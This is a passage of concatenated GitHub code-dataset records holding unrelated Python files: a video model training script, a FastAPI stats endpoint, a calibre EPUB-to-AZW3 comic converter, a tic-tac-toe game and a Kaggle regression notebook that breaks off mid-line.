\"%s.rep_learning.tag:%s.layers%d.attn_win%d.classes%d_rok_class_per_trn.task_%s\"\n % (\n opt.dataset,\n opt.tag,\n opt.num_hidden_layers,\n opt.attention_window[0],\n opt.num_classes,\n opt.task,\n )\n )\n\n opt.viz_env = \"%s.%s%s_%s.\" % (\n opt.model_name,\n opt.temp_learning_dataset_name,\n opt.env_pref,\n opt.sfx,\n )\n opt.sfx = str(\n \"%s.rep_learning.tag:%s.layers%d.attn_win%d.classes%d.time%s\"\n % (\n opt.dataset,\n opt.tag,\n opt.num_hidden_layers,\n opt.attention_window[0],\n opt.num_classes,\n datetime.now().strftime(\"%Y%m%d-%H%M%S\"),\n )\n )\n if opt.debug:\n opt.num_workers = 0\n opt.batch_size = 5\n opt.save_model = False\n opt.epochs = 1\n opt.viz = False\n\n setup_logger_path()\n\n train_set, val_set, test_set = None, None, None\n if opt.dataset == \"kinetics\":\n train_set = KineticsDataset(\n \"train\",\n fps=25,\n fpc=32,\n spat_crop=True,\n hflip=False,\n norm_statistics={\n \"mean\": [0.43216, 0.394666, 0.37645],\n \"std\": [0.22803, 0.22145, 0.216989],\n },\n feat_ext=True,\n data_level=opt.rep_data_level,\n feat_set=\"%s_feats\" % opt.rep_backbone,\n )\n val_set = KineticsDataset(\n \"val\",\n fps=25,\n fpc=32,\n spat_crop=True,\n hflip=False,\n norm_statistics={\n \"mean\": [0.43216, 0.394666, 0.37645],\n \"std\": [0.22803, 0.22145, 0.216989],\n },\n feat_ext=True,\n data_level=opt.rep_data_level,\n feat_set=\"%s_feats\" % opt.rep_backbone,\n )\n elif opt.dataset == \"rareact\":\n pass\n elif opt.dataset == \"oops\":\n pass\n elif opt.dataset == \"all\":\n train_set = OopsTtibua(\n \"train\",\n spat_scale=True,\n size=224,\n spat_crop=True,\n load_frames=True if opt.backbone == \"r3d_18\" else False,\n )\n val_set = OopsTtibua(\n \"val\",\n spat_scale=True,\n size=224,\n spat_crop=True,\n 
load_frames=True if opt.backbone == \"r3d_18\" else False,\n )\n\n if opt.dataset == \"all\":\n train_loader = DataLoader(\n train_set,\n num_workers=opt.num_workers,\n batch_size=opt.batch_size,\n shuffle=True,\n drop_last=True,\n collate_fn=train_set.speed_and_motion_collate_fn\n if not opt.multi_scale\n else train_set.video_level_speed_and_motion_collate_fn,\n )\n\n val_loader = DataLoader(\n val_set,\n num_workers=opt.num_workers,\n batch_size=opt.batch_size,\n shuffle=False,\n drop_last=True,\n collate_fn=val_set.speed_and_motion_collate_fn\n if not opt.multi_scale\n else train_set.video_level_speed_and_motion_collate_fn,\n )\n else:\n train_loader = DataLoader(\n train_set,\n num_workers=opt.num_workers,\n batch_size=opt.batch_size,\n shuffle=False if opt.debug else True,\n drop_last=True,\n collate_fn=train_set._rep_lrn_collate_fn,\n )\n\n val_loader = DataLoader(\n val_set,\n num_workers=opt.num_workers,\n batch_size=opt.batch_size,\n shuffle=False if opt.debug else True,\n drop_last=True,\n collate_fn=val_set._rep_lrn_collate_fn,\n )\n\n if opt.multi_scale:\n model, optimizer, loss = create_model_trn_2x(\n opt.num_classes, pretrained=opt.pretrained, pretrain_scale=\"frame\"\n )\n else:\n if opt.backbone == \"vit_longformer\":\n model, optimizer, loss = create_model(\n opt.num_classes, pretrained=opt.pretrained\n )\n elif opt.backbone == \"r3d_18\":\n model, optimizer, loss = create_r3d(pretrained=opt.pretrained)\n\n epoch = 0\n\n # if opt.pretrained:\n # saved_model = torch.load(opt.vtn_ptr_path)\n # optimizer.load_state_dict(saved_model['optimizer'])\n # epoch = saved_model['epoch'] + 1\n\n # opt.batch_size = 256\n # opt.workers = 32\n # opt.balance_fails_only = True\n # opt.all_fail_videos = False\n # # train_loader = get_video_loader(opt)\n # opt.val = True\n # opt.fails_path = '/BS/unintentional_actions/nobackup/oops/oops_dataset/oops_video'\n # val_loader_class = get_video_loader(opt)\n # opt.batch_size = 32\n\n train(\n model=model,\n train_loader=train_loader,\n val_loader=val_loader,\n optimizer=optimizer,\n loss=loss,\n test_freq=1,\n epochs=25,\n train_set=train_set,\n epoch=epoch,\n )\n\n return\n\n\nif __name__ == \"__main__\":\n warnings.filterwarnings(\"ignore\")\n\n learn_representation()\n","repo_name":"dukaenea/unintentional_actions","sub_path":"rep_learning/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30113378441","text":"import os\nimport datetime\n\nimport psutil\nimport asyncpg\nimport platform\nfrom fastapi import APIRouter\nfrom dotenv import load_dotenv\n\nfrom utils import get_lines, db_conn\n\nload_dotenv()\n\ndb_url = os.environ[\"DATABASE_URL\"]\n\nUPTIME = datetime.datetime.now()\n\n# Title for docs\ntags_metadata = [\n {\n \"name\": \"Stats\",\n }\n]\n\nstats = APIRouter(tags=tags_metadata)\n\nasync def get_uptime():\n time_right_now = datetime.datetime.now()\n seconds = int((time_right_now - UPTIME).total_seconds())\n time = f\"{seconds}s\"\n if seconds > 60:\n minutes = seconds - (seconds % 60)\n seconds = seconds - minutes\n minutes = int(minutes / 60)\n time = f\"{minutes}min {seconds}s\"\n if minutes > 60:\n hoursglad = minutes - (minutes % 60)\n hours = int(hoursglad / 60)\n minutes = minutes - (hours*60)\n time = f\"{hours}h {minutes}min {seconds}s\"\n\n return time\n\n\nasync def get_stats_from_db():\n\n async with db_conn(db_url) as connection:\n\n data = await connection.fetch(\"SELECT * FROM Stats\")\n\n 
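# flatten the fetched (key, value) rows into a plain dict for the JSON response\n 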
return_dict = {}\n\n for record in data:\n return_dict[record[0]] = record[1]\n\n return return_dict\n\n\n@stats.get(\"/stats/\")\nasync def get_stats():\n \n time = await get_uptime()\n\n stat_data = await get_stats_from_db() \n \n\n system_data = {\n \"memory\" : f'{psutil.virtual_memory().percent}%',\n \"running_on\" : f\"{platform.system()} {platform.release()}\",\n \"python_version\" : f\"{platform.python_version()}\",\n \"cpu\" : f'{psutil.cpu_percent()}%'\n }\n \n return {\n \"uptime\" : time,\n \"stats\" : stat_data,\n \"system_stats\" : system_data,\n \"lines\" : (await get_lines())\n }","repo_name":"songkq/FusionSidsAPI","sub_path":"routers/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41674546623","text":"#! /usr/bin/calibre-debug\n\nfrom calibre.ebooks.oeb.base import Manifest, Metadata, xpath\nfrom calibre.ebooks.oeb.polish.container import get_container\nfrom calibre.ebooks.mobi.writer2.resources import Resources\nfrom calibre.ebooks.mobi.writer8.main import KF8Writer\nfrom calibre.ebooks.mobi.writer8.mobi import KF8Book\nfrom calibre.ebooks.mobi.writer8.exth import EXTH_CODES\nfrom calibre.ebooks.oeb.reader import OEBReader\n\nimport sys\nfrom os import path\n\namzn_exth_codes = {\n u'fixed-layout': 122,\n u'book-type': 123,\n u'orientation-lock': 124,\n u'KF8_Count_of_Resources_Fonts_Images': 125,\n u'original-resolution': 126,\n u'zero-gutter': 127,\n u'zero-margin': 128,\n u'KF8_Masthead/Cover_Image': 129,\n u'RegionMagnification': 132,\n u'CoverOffset': 201,\n u'ThumbOffset': 202,\n u'Fake Cover': 203,\n u'Language': 524,\n u'primary-writing-mode': 525,\n u'542':542,\n u'547': 547,\n}\n\ncomic_book_exth_values = {\n 'fixed-layout': 'true',\n 'book-type': 'comic',\n 'orientation-lock': 'portrait',\n 'original-resolution': '960x1280',\n 'zero-gutter': 'true',\n 'zero-margin': 'true',\n 'KF8_Count_of_Resources_Fonts_Images': 0,\n '547': 'InMemory'\n}\n\ndef patch_exth_codes():\n for c in amzn_exth_codes:\n if c in EXTH_CODES:\n print ('EXTH code already defined: ', c)\n EXTH_CODES[c] = amzn_exth_codes[c]\n\ndef dump_metadata(metadata):\n for k in metadata:\n for item in metadata[k]:\n print ('{}: {}'.format(k, item))\n\n\ndef fixup_metadata(oeb):\n metadata = Metadata(oeb)\n for k in oeb.metadata:\n v = oeb.metadata[k]\n if k in ['contributor']:\n print ('Stripping {}: {}'.format(k, v))\n continue\n for i in v:\n if k=='language' and i.value=='eng':\n metadata.add(k, 'en')\n else:\n metadata[k].append(i)\n\n for k,v in comic_book_exth_values.items():\n metadata.add(k,v)\n\n oeb.metadata = metadata\n oeb.metadata.add('subject', 'Comics')\n\n \ndef create_kf8_book(oeb, opts, resources):\n\n # I need to know the text_length without CSS\n class DummyKF8Writer(KF8Writer):\n def extract_css_into_flows(self):\n pass\n\n dummy_writer = DummyKF8Writer(oeb, opts, resources)\n writer = KF8Writer(oeb, opts, resources)\n book = KF8Book(writer, for_joint=False)\n\n # This gets written to the MOBI header\n book.text_length = dummy_writer.text_length\n\n dump_metadata(book.metadata)\n return book\n\n\ndef set_cover_image(oeb):\n if oeb.metadata['cover']:\n print (oeb.metadata['cover'])\n else:\n cover = None\n for h, item in oeb.manifest.hrefs.items():\n if item.id in [ 'cover-image', 'x_cover-image' ]:\n if not cover or item.id == 'cover-image':\n cover = item.id\n print ('Detected cover: {} href={}'.format(item.id, h))\n\n if cover:\n 
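# register the detected manifest item id as the cover in the OPF metadata\n 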
oeb.metadata.add('cover', cover)\n\n\ndef opf_to_book(opf, outpath, container):\n from calibre.ebooks.conversion.plumber import Plumber, create_oebbook\n class Item(Manifest.Item):\n def _parse_css(self, data):\n # The default CSS parser used by oeb.base inserts the h namespace\n # and resolves all @import rules. We don't want that.\n return container.parse_css(data)\n def specialize(oeb):\n oeb.manifest.Item = Item\n\n plumber = Plumber(opf, outpath, container.log)\n plumber.setup_options()\n\n class Reader(OEBReader):\n def _metadata_from_opf(self, opf):\n for e in xpath(opf, 'o2:metadata//o2:meta'):\n if e.attrib.get('name') == 'original-resolution':\n comic_book_exth_values['original-resolution'] = e.attrib.get('content', '660x800')\n return OEBReader._metadata_from_opf(self, opf)\n\n\n oeb = create_oebbook(container.log, opf, plumber.opts, specialize=specialize, reader=Reader)\n\n fixup_metadata(oeb)\n set_cover_image(oeb)\n\n plumber.opts.dont_compress = True\n plumber.opts.toc_title = None\n plumber.opts.mobi_toc_at_start = False\n plumber.opts.no_inline_toc = True\n plumber.opts.mobi_periodical = False\n\n res = Resources(oeb, plumber.opts, False, process_images=False)\n \n if path.splitext(outpath)[1] != '.azw3':\n plumber.run()\n else:\n book = create_kf8_book(oeb, plumber.opts, res) \n book.opts.prefer_author_sort = False\n book.opts.share_not_sync = False\n print ('\\nWriting out: {}\\n'.format(outpath))\n book.write(outpath)\n\n\ndef epub_to_book(epub, outpath=None):\n container = get_container(epub, tweak_mode=True)\n outpath = outpath or (epub.rpartition('.')[0] + '.azw3')\n opf_to_book(container.name_to_abspath(container.opf_name), outpath, container)\n\n\ndef extract_mobi(mobi_path, extract_to):\n from calibre.ebooks.mobi.debug.main import inspect_mobi\n inspect_mobi(mobi_path, ddir=extract_to)\n\n\ndef main(argv=sys.argv):\n\n input_path = argv[1]\n if input_path.endswith('.mobi'):\n extract_mobi(input_path, path.splitext(input_path)[0] + '_extracted_mobi')\n else:\n if len(argv) > 2:\n output_path = argv[2]\n else:\n if path.isdir(input_path):\n output_path = input_path.replace('-epub', '.azw3').strip('/')\n else:\n output_path = path.splitext(input_path)[0] + '.azw3'\n\n patch_exth_codes()\n epub_to_book(input_path, output_path)\n\nif __name__ == '__main__':\n main()\n","repo_name":"cristivlas/epub-comics","sub_path":"epub_to_azw3_comic.py","file_name":"epub_to_azw3_comic.py","file_ext":"py","file_size_in_byte":5561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20268148017","text":"#Create a program for playing \"\"Tic-tac-toe\"\".\nmaps = [1,2,3,\n 4,5,6,\n 7,8,9]\n \n\nshablon = [[0,1,2],\n [3,4,5],\n [6,7,8],\n [0,3,6],\n [1,4,7],\n [2,5,8],\n [0,4,8],\n [2,4,6]]\n \n\ndef print_maps():\n print(maps[0], end = \" \")\n print(maps[1], end = \" \")\n print(maps[2])\n \n print(maps[3], end = \" \")\n print(maps[4], end = \" \")\n print(maps[5])\n \n print(maps[6], end = \" \")\n print(maps[7], end = \" \")\n print(maps[8]) \n \ndef step_maps(step,symbol):\n ind = maps.index(step)\n maps[ind] = symbol\n \ndef get_result():\n win = \"\"\n \n for i in shablon:\n if maps[i[0]] == \"X\" and maps[i[1]] == \"X\" and maps[i[2]] == \"X\":\n win = \"X\"\n if maps[i[0]] == \"O\" and maps[i[1]] == \"O\" and maps[i[2]] == \"O\":\n win = \"O\" \n \n return win\n\nplayer1 = 1\ncount = 9\nwhile count > 0:\n print_maps()\n if player1 == 1:\n symbol = \"X\"\n step = int(input(\"X, your move: \"))\n else:\n symbol = \"O\"\n step = int(input(\"O, your move: \"))\n \n step_maps(step,symbol) # make the move into the chosen cell\n win = get_result() # determine the winner\n count -= 1\n if win != \"\":\n break\n player1 = not(player1) \n\nprint_maps()\nif win ==\"\":\n print(\"Draw\")\nelse:\n print(\"The winner is\", win)\n\n","repo_name":"Andrey211263/DZ_Sem05","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10147372605","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# > **Problem overview**\n# \n# Long ago, in the distant, fragrant mists of time, there was a competition...\n# \n# It was not just any competition. It was a competition that challenged mere mortals to model a 20,000x200 matrix of continuous variables using only 250 training samples... without overfitting. Data scientists ― including Kaggle's very own Will Cukierski ― competed by the hundreds. Legends were made. (Will took 5th place, and eventually ended up working at Kaggle!) People overfit like crazy. It was a Kaggle-y, data science-y madhouse.\n# \n# So... we're doing it again.\n# \n# This is the next logical step in the evolution of weird competitions. Once again we have 20,000 rows of continuous variables, and a mere handful of training samples. Once again, we challenge you not to overfit. Do your best, model without overfitting, and add, perhaps, to your own legend. In addition to bragging rights, the winner also gets swag. Enjoy!\n# \n# Interesting article:\n# * https://machinelearningmastery.com/roc-curves-and-precision-recall-curves-for-classification-in-python/\n\n# In[ ]:\n\n\n# import data manipulation library\nimport numpy as np\nimport pandas as pd\n\n# import data visualization library\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# import pystan model class\nimport pystan\n\n# import sklearn data preprocessing\nfrom sklearn.preprocessing import RobustScaler\n\n# import sklearn model class\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Lasso\nfrom sklearn.linear_model import Ridge\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.kernel_ridge import KernelRidge\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\n\n# import sklearn model selection\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\n\n# import sklearn model evaluation classification metrics\nfrom sklearn.metrics import accuracy_score, auc, classification_report, confusion_matrix, f1_score, fbeta_score, precision_recall_curve, precision_score, recall_score, roc_auc_score, roc_curve\n\n# > **Acquiring training and testing data**\n# \n# We start by acquiring the training and testing datasets into Pandas DataFrames.\n\n# In[ ]:\n\n\n# acquiring training and testing data\ndf_train = pd.read_csv('../input/train.csv')\ndf_test = pd.read_csv('../input/test.csv')\n\n# In[ ]:\n\n\n# visualize head of the training data\ndf_train.head(n=5)\n\n# In[ ]:\n\n\n# visualize tail of the testing data\ndf_test.tail(n=5)\n\n# In[ ]:\n\n\n# combine training and testing dataframe\ndf_train['datatype'], df_test['datatype'] = 'training', 'testing'\ndf_test.insert(1, 'target', np.nan)\ndf_data = pd.concat([df_train, df_test], ignore_index=True)\n\n# > **Feature exploration, engineering and cleansing**\n# \n# Here we generate descriptive statistics 
that summarize the central tendency, dispersion and shape of a dataset’s distribution together with exploring some data.\n\n# In[ ]:\n\n\n# countplot function plot - categorical variable (x-axis) vs. categorical variable (y-axis)\ndef countplot(x = None, y = None, data = None, ncols = 5, nrows = 3):\n fig, axes = plt.subplots(figsize=(4*ncols , 3*nrows), ncols=ncols, nrows=nrows)\n axes = axes.flatten()\n for i, v in enumerate(x): sns.countplot(x=v, hue=y, data=data, ax=axes[i])\n\n# In[ ]:\n\n\n# boxplot function plot - categorical variable (x-axis) vs. numerical variable (y-axis)\ndef boxplot(cat = None, num = None, data = None, ncols = 5, nrows = 3):\n fig, axes = plt.subplots(figsize=(4*ncols , 3*nrows), ncols=ncols, nrows=nrows)\n axes = axes.flatten()\n if type(cat) == list:\n for i, v in enumerate(cat): sns.boxplot(x=v, y=num, data=data, ax=axes[i])\n else:\n for i, v in enumerate(num): sns.boxplot(x=cat, y=v, data=data, ax=axes[i])\n\n# In[ ]:\n\n\n# swarmplot function plot - categorical variable (x-axis) vs. numerical variable (y-axis)\ndef swarmplot(cat = None, num = None, data = None, ncols = 5, nrows = 3):\n fig, axes = plt.subplots(figsize=(4*ncols , 3*nrows), ncols=ncols, nrows=nrows)\n axes = axes.flatten()\n if type(cat) == list:\n for i, v in enumerate(cat): sns.swarmplot(x=v, y=num, data=data, ax=axes[i])\n else:\n for i, v in enumerate(num): sns.swarmplot(x=cat, y=v, data=data, ax=axes[i])\n\n# In[ ]:\n\n\n# violinplot function plot - categorical variable (x-axis) vs. numerical variable (y-axis)\ndef violinplot(cat = None, num = None, data = None, ncols = 5, nrows = 3):\n fig, axes = plt.subplots(figsize=(4*ncols , 3*nrows), ncols=ncols, nrows=nrows)\n axes = axes.flatten()\n if type(cat) == list:\n for i, v in enumerate(cat): sns.violinplot(x=v, y=num, data=data, ax=axes[i])\n else:\n for i, v in enumerate(num): sns.violinplot(x=cat, y=v, data=data, ax=axes[i])\n\n# In[ ]:\n\n\n# scatterplot function plot - numerical variable (x-axis) vs. 
numerical variable (y-axis)\ndef scatterplot(x = None, y = None, data = None, ncols = 5, nrows = 3):\n fig, axes = plt.subplots(figsize=(4*ncols , 3*nrows), ncols=ncols, nrows=nrows)\n axes = axes.flatten()\n for i, xi in enumerate(x): sns.scatterplot(x=xi, y=y, data=data, ax=axes[i])\n\n# In[ ]:\n\n\n# describe training and testing data\ndf_data.describe(include='all')\n\n# In[ ]:\n\n\n# convert dtypes numeric to object\ncol_convert = ['target']\ndf_data[col_convert] = df_data[col_convert].astype('object')\n\n# In[ ]:\n\n\n# list all features type number\ncol_number = df_data.select_dtypes(include=['number']).columns.tolist()\nprint('features type number:\\n items %s\\n length %d' %(col_number, len(col_number)))\n\n# list all features type object\ncol_object = df_data.select_dtypes(include=['object']).columns.tolist()\nprint('features type object:\\n items %s\\n length %d' %(col_object, len(col_object)))\n\n# In[ ]:\n\n\n# feature exploration: histogram of all numeric features\n_ = df_data.hist(bins=20, figsize=(200, 150))\n\n# After extracting all features, it is required to convert category features to numerics features, a format suitable to feed into our Machine Learning models.\n\n# In[ ]:\n\n\n# feature extraction: target\ndf_data['target'] = df_data['target'].fillna(-1)\n\n# In[ ]:\n\n\n# convert category codes for data dataframe\ndf_data = pd.get_dummies(df_data, columns=['datatype'], drop_first=True)\n\n# In[ ]:\n\n\n# convert dtypes object to numeric for data dataframe\ncol_convert = ['target']\ndf_data[col_convert] = df_data[col_convert].astype(int)\n\n# In[ ]:\n\n\n# describe data dataframe\ndf_data.describe(include='all')\n\n# In[ ]:\n\n\n# verify dtypes object\ndf_data.info()\n\n# > **Analyze and identify patterns by visualizations**\n# \n# Let us generate some correlation plots of the features to see how related one feature is to the next. To do so, we will utilize the Seaborn plotting package which allows us to plot very conveniently as follows.\n# \n# The Pearson Correlation plot can tell us the correlation between features with one another. If there is no strongly correlated between features, this means that there isn't much redundant or superfluous data in our training data. 
This plot is also useful to determine which features are correlated to the observed value.\n# \n# The pairplots is also useful to observe the distribution of the training data from one feature to the other.\n# \n# The pivot table is also another useful method to observe the impact between features.\n\n# > **Model, predict and solve the problem**\n# \n# Now, it is time to feed the features to Machine Learning models.\n\n# In[ ]:\n\n\n# select all features to evaluate the feature importances\nx = df_data[df_data['datatype_training'] == 1].drop(['id', 'target', 'datatype_training'], axis=1)\ny = df_data.loc[df_data['datatype_training'] == 1, 'target']\n\n# In[ ]:\n\n\n# set up lasso regression to find the feature importances\nlassoreg = Lasso(alpha=1e-5).fit(x, y)\nfeat = pd.DataFrame(data=lassoreg.coef_, index=x.columns, columns=['feature_importances']).sort_values(['feature_importances'], ascending=False)\n\n# In[ ]:\n\n\n# plot the feature importances\nfeat[(feat['feature_importances'] < -1e-3) | (feat['feature_importances'] > 1e-3)].dropna().plot(y='feature_importances', figsize=(20, 5), kind='bar')\nplt.axhline(-0.05, color=\"grey\")\nplt.axhline(0.05, color=\"grey\")\n\n# In[ ]:\n\n\n# list feature importances\nmodel_feat = feat[(feat['feature_importances'] < -0.05) | (feat['feature_importances'] > 0.05)].index\n\n# In[ ]:\n\n\n# select the important features\nx = df_data.loc[df_data['datatype_training'] == 1, model_feat]\ny = df_data.loc[df_data['datatype_training'] == 1, 'target']\n\n# In[ ]:\n\n\n# create scaler to the features\nscaler = RobustScaler()\nx = scaler.fit_transform(x)\n\n# In[ ]:\n\n\n# perform train-test (validate) split\nx_train, x_validate, y_train, y_validate = train_test_split(x, y, random_state=58, test_size=0.25)\n\n# In[ ]:\n\n\n# linear regression model setup\nmodel_linreg = LinearRegression()\n\n# linear regression model fit\nmodel_linreg.fit(x_train, y_train)\n\n# linear regression model prediction\nmodel_linreg_ypredict = model_linreg.predict(x_validate)\n\n# linear regression model metrics\nmodel_linreg_rocaucscore = roc_auc_score(y_validate, model_linreg_ypredict)\nmodel_linreg_cvscores = cross_val_score(model_linreg, x, y, cv=20, scoring='roc_auc')\nprint('linear regression\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_linreg_rocaucscore, model_linreg_cvscores.mean(), 2 * model_linreg_cvscores.std()))\n\n# With linear regression submission, the LB score is 0.629. 
It's seem overfitting.\n\n# In[ ]:\n\n\n# lasso regression model setup\nmodel_lassoreg = Lasso(alpha=0.01)\n\n# lasso regression model fit\nmodel_lassoreg.fit(x_train, y_train)\n\n# lasso regression model prediction\nmodel_lassoreg_ypredict = model_lassoreg.predict(x_validate)\n\n# lasso regression model metrics\nmodel_lassoreg_rocaucscore = roc_auc_score(y_validate, model_lassoreg_ypredict)\nmodel_lassoreg_cvscores = cross_val_score(model_lassoreg, x, y, cv=20, scoring='roc_auc')\nprint('lasso regression\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_lassoreg_rocaucscore, model_lassoreg_cvscores.mean(), 2 * model_lassoreg_cvscores.std()))\n\n# In[ ]:\n\n\n# specify the hyperparameter space\nparams = {\n 'alpha': np.logspace(-4, -2, base=10, num=50),\n}\n\n# lasso regression grid search model setup\nmodel_lassoreg_cv = GridSearchCV(model_lassoreg, params, iid=False, cv=5)\n\n# lasso regression grid search model fit\nmodel_lassoreg_cv.fit(x_train, y_train)\n\n# lasso regression grid search model prediction\nmodel_lassoreg_cv_ypredict = model_lassoreg_cv.predict(x_validate)\n\n# lasso regression grid search model metrics\nmodel_lassoreg_cv_rocaucscore = roc_auc_score(y_validate, model_lassoreg_cv_ypredict)\nmodel_lassoreg_cv_cvscores = cross_val_score(model_lassoreg_cv, x, y, cv=20, scoring='roc_auc')\nprint('lasso regression grid search\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_lassoreg_cv_rocaucscore, model_lassoreg_cv_cvscores.mean(), 2 * model_lassoreg_cv_cvscores.std()))\nprint(' best parameters: %s' %model_lassoreg_cv.best_params_)\n\n# With lasso regression submission, the LB score is 0.704. It's seem overfitting.\n\n# In[ ]:\n\n\n# ridge regression model setup\nmodel_ridgereg = Ridge(alpha=35)\n\n# ridge regression model fit\nmodel_ridgereg.fit(x_train, y_train)\n\n# ridge regression model prediction\nmodel_ridgereg_ypredict = model_ridgereg.predict(x_validate)\n\n# ridge regression model metrics\nmodel_ridgereg_rocaucscore = roc_auc_score(y_validate, model_ridgereg_ypredict)\nmodel_ridgereg_cvscores = cross_val_score(model_ridgereg, x, y, cv=20, scoring='roc_auc')\nprint('ridge regression\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_ridgereg_rocaucscore, model_ridgereg_cvscores.mean(), 2 * model_ridgereg_cvscores.std()))\n\n# In[ ]:\n\n\n# specify the hyperparameter space\nparams = {'alpha': np.logspace(-4, 4, base=10, num=50)}\n\n# ridge regression grid search model setup\nmodel_ridgereg_cv = GridSearchCV(model_ridgereg, params, iid=False, cv=5)\n\n# ridge regression grid search model fit\nmodel_ridgereg_cv.fit(x_train, y_train)\n\n# ridge regression grid search model prediction\nmodel_ridgereg_cv_ypredict = model_ridgereg_cv.predict(x_validate)\n\n# ridge regression grid search model metrics\nmodel_ridgereg_cv_rocaucscore = roc_auc_score(y_validate, model_ridgereg_cv_ypredict)\nmodel_ridgereg_cv_cvscores = cross_val_score(model_ridgereg_cv, x, y, cv=20, scoring='roc_auc')\nprint('ridge regression grid search\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_ridgereg_cv_rocaucscore, model_ridgereg_cv_cvscores.mean(), 2 * model_ridgereg_cv_cvscores.std()))\nprint(' best parameters: %s' %model_ridgereg_cv.best_params_)\n\n# With ridge regression submission, the LB score is 0.690. 
It's seem overfitting.\n\n# In[ ]:\n\n\n# elastic net regression model setup\nmodel_elasticnetreg = ElasticNet(alpha=0.01, l1_ratio=0.9)\n\n# elastic net regression model fit\nmodel_elasticnetreg.fit(x_train, y_train)\n\n# elastic net regression model prediction\nmodel_elasticnetreg_ypredict = model_elasticnetreg.predict(x_validate)\n\n# elastic net regression model metrics\nmodel_elasticnetreg_rocaucscore = roc_auc_score(y_validate, model_elasticnetreg_ypredict)\nmodel_elasticnetreg_cvscores = cross_val_score(model_elasticnetreg, x, y, cv=20, scoring='roc_auc')\nprint('elastic net regression\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_elasticnetreg_rocaucscore, model_elasticnetreg_cvscores.mean(), 2 * model_elasticnetreg_cvscores.std()))\n\n# In[ ]:\n\n\n# specify the hyperparameter space\nparams = {'alpha': np.logspace(-4, -2, base=10, num=10),\n 'l1_ratio': np.linspace(0.1, 0.9, num=5),\n}\n\n# elastic net regression grid search model setup\nmodel_elasticnetreg_cv = GridSearchCV(model_elasticnetreg, params, iid=False, cv=5)\n\n# elastic net regression grid search model fit\nmodel_elasticnetreg_cv.fit(x_train, y_train)\n\n# elastic net regression grid search model prediction\nmodel_elasticnetreg_cv_ypredict = model_elasticnetreg_cv.predict(x_validate)\n\n# elastic net regression grid search model metrics\nmodel_elasticnetreg_cv_rocaucscore = roc_auc_score(y_validate, model_elasticnetreg_cv_ypredict)\nmodel_elasticnetreg_cv_cvscores = cross_val_score(model_elasticnetreg_cv, x, y, cv=20, scoring='roc_auc')\nprint('elastic net regression grid search\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_elasticnetreg_cv_rocaucscore, model_elasticnetreg_cv_cvscores.mean(), 2 * model_elasticnetreg_cv_cvscores.std()))\nprint(' best parameters: %s' %model_elasticnetreg_cv.best_params_)\n\n# In[ ]:\n\n\n# kernel ridge regression model setup\nmodel_kernelridgereg = KernelRidge(alpha=0.0001, degree=4, kernel='polynomial')\n\n# kernel ridge regression model fit\nmodel_kernelridgereg.fit(x_train, y_train)\n\n# kernel ridge regression model prediction\nmodel_kernelridgereg_ypredict = model_kernelridgereg.predict(x_validate)\n\n# kernel ridge regression model metrics\nmodel_kernelridgereg_rocaucscore = roc_auc_score(y_validate, model_kernelridgereg_ypredict)\nmodel_kernelridgereg_cvscores = cross_val_score(model_kernelridgereg, x, y, cv=20, scoring='roc_auc')\nprint('kernel ridge regression\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_kernelridgereg_rocaucscore, model_kernelridgereg_cvscores.mean(), 2 * model_kernelridgereg_cvscores.std()))\n\n# In[ ]:\n\n\n# specify the hyperparameter space\nparams = {'alpha': np.logspace(-4, -2, base=10, num=10),\n 'degree': [1, 2, 3, 4, 5],\n}\n\n# kernel ridge regression grid search model setup\nmodel_kernelridgereg_cv = GridSearchCV(model_kernelridgereg, params, iid=False, cv=5)\n\n# kernel ridge regression grid search model fit\nmodel_kernelridgereg_cv.fit(x_train, y_train)\n\n# kernel ridge regression grid search model prediction\nmodel_kernelridgereg_cv_ypredict = model_kernelridgereg_cv.predict(x_validate)\n\n# kernel ridge regression grid search model metrics\nmodel_kernelridgereg_cv_rocaucscore = roc_auc_score(y_validate, model_kernelridgereg_cv_ypredict)\nmodel_kernelridgereg_cv_cvscores = cross_val_score(model_kernelridgereg_cv, x, y, cv=20, scoring='roc_auc')\nprint('kernel ridge regression grid search\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' 
